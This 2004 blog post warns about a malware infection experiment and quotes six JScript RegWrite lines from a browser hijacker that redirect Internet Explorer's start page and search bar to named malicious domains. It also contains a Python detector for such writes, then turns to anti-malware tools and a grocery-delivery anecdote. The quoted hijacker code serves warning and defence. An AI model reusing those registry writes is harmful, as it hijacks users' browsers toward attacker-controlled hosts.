Tuesday, July 27, 2004


Technology, what a concept

Short shrift today because of D&D (minor deities and daemons) consuming all of my cycles.

This article documents a controlled experiment using a VMware instance of XP Home where a security analyst deliberately let the system be infected by malware. If you still need a reason to turn off JavaScript, read this through. These malware purveyors are real cuties, encoding in hex a bunch of code that will replace your default homepage and search engine with their (ahem) value added code, and destroy your ability to use Windows Media Player, not to mention downloading a stub program that will further download various trojans to your desktop.

An example of the cute code (and whatever you do, do not go to the URLs in the code unless you know what you're doing! Repeat, there be dragons):

wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar", "http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar", "http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");

The code begs the question as to why things such as this can have write permission to sensitive keys in the registry without at least some form of confirmation, but you can leave that for the next MSFT shareholders' meeting. You've been warned.
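For anyone triaging a suspicious script before it gets anywhere near a browser, here is a small static check, added as an example and not taken from the article or any product mentioned here. It undoes the hex encoding described above and lists every RegWrite aimed at the Internet Explorer\Main values shown in the excerpt. The function names, the sample script and the hijack.example URL are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Value names under Internet Explorer\Main that the quoted script overwrites.
WATCHED_VALUES = {"start page", "search bar", "use search asst"}
IE_MAIN = r"software\microsoft\internet explorer\main"

# RegWrite("<key>", "<data>") with JScript-style backslash escapes inside the strings.
REGWRITE = re.compile(r'RegWrite\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*"((?:[^"\\]|\\.)*)"')

def decode_layers(text, max_rounds=5):
    """Undo %XX and \\xNN hex encoding repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        decoded = re.sub(r'(?<!\\)\\x([0-9a-fA-F]{2})',
                         lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == text:
            break
        text = decoded
    return text

def find_hijack_writes(script):
    """Return (hive, value_name, data) for each RegWrite that targets IE\\Main settings."""
    hits = []
    for key, data in REGWRITE.findall(decode_layers(script)):
        key = key.replace("\\\\", "\\")          # collapse the script's escaped backslashes
        hive, _, rest = key.partition("\\")
        path, _, name = rest.rpartition("\\")
        if path.lower() == IE_MAIN and name.lower() in WATCHED_VALUES:
            hits.append((hive.upper(), name, data))
    return hits

# Constructed sample in the shape of the excerpt above; the URL is a placeholder.
SAMPLE = r'''
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://hijack.example/start?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKCU\\Software\\Example\\Unrelated", "1");
'''
# The same script with every character hex-encoded, as a delivery page might carry it.
ENCODED = "".join("%%%02X" % ord(c) for c in SAMPLE)

if __name__ == "__main__":
    for hive, name, data in find_hijack_writes(ENCODED):
        print(f"{hive}: {name} -> {data}")
```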

One thing that may help is a utility called BOClean. It's certainly a great idea, has gotten very good reviews, and it's certainly much easier on system resources than Norton AntiVirus. I'm rather down on NAV lately, as the 2004 edition has gotten incredibly bloated, and absolutely gummed up several systems here at Beobachterschloss Am Berg. The 2002 version is much lighter in footprint, and even caught a couple of trojan attempts when I was wandering far from my usual haunts in search of ever newer goodies to opine on. SpywareBlaster and the immunize features from the various scanners are still a primary line of defense, though.

An article in the local paper indicated that Peapod has extended its service to my town, and I decided to check it out. The Mrs. was only mildly interested, but Mom was quite curious about saving the schlep to the market. So we took a look at the kosher offerings, and it was the usual supermarket stuff (Empire turkeys, Hebrew National franks), but the rotating promotional ads below gave us a huge belly laugh. It seems that their ad server thought that people perusing the kosher section would also be interested in scallops wrapped in bacon, brown and serve sausage, and pasteurized crabmeat.


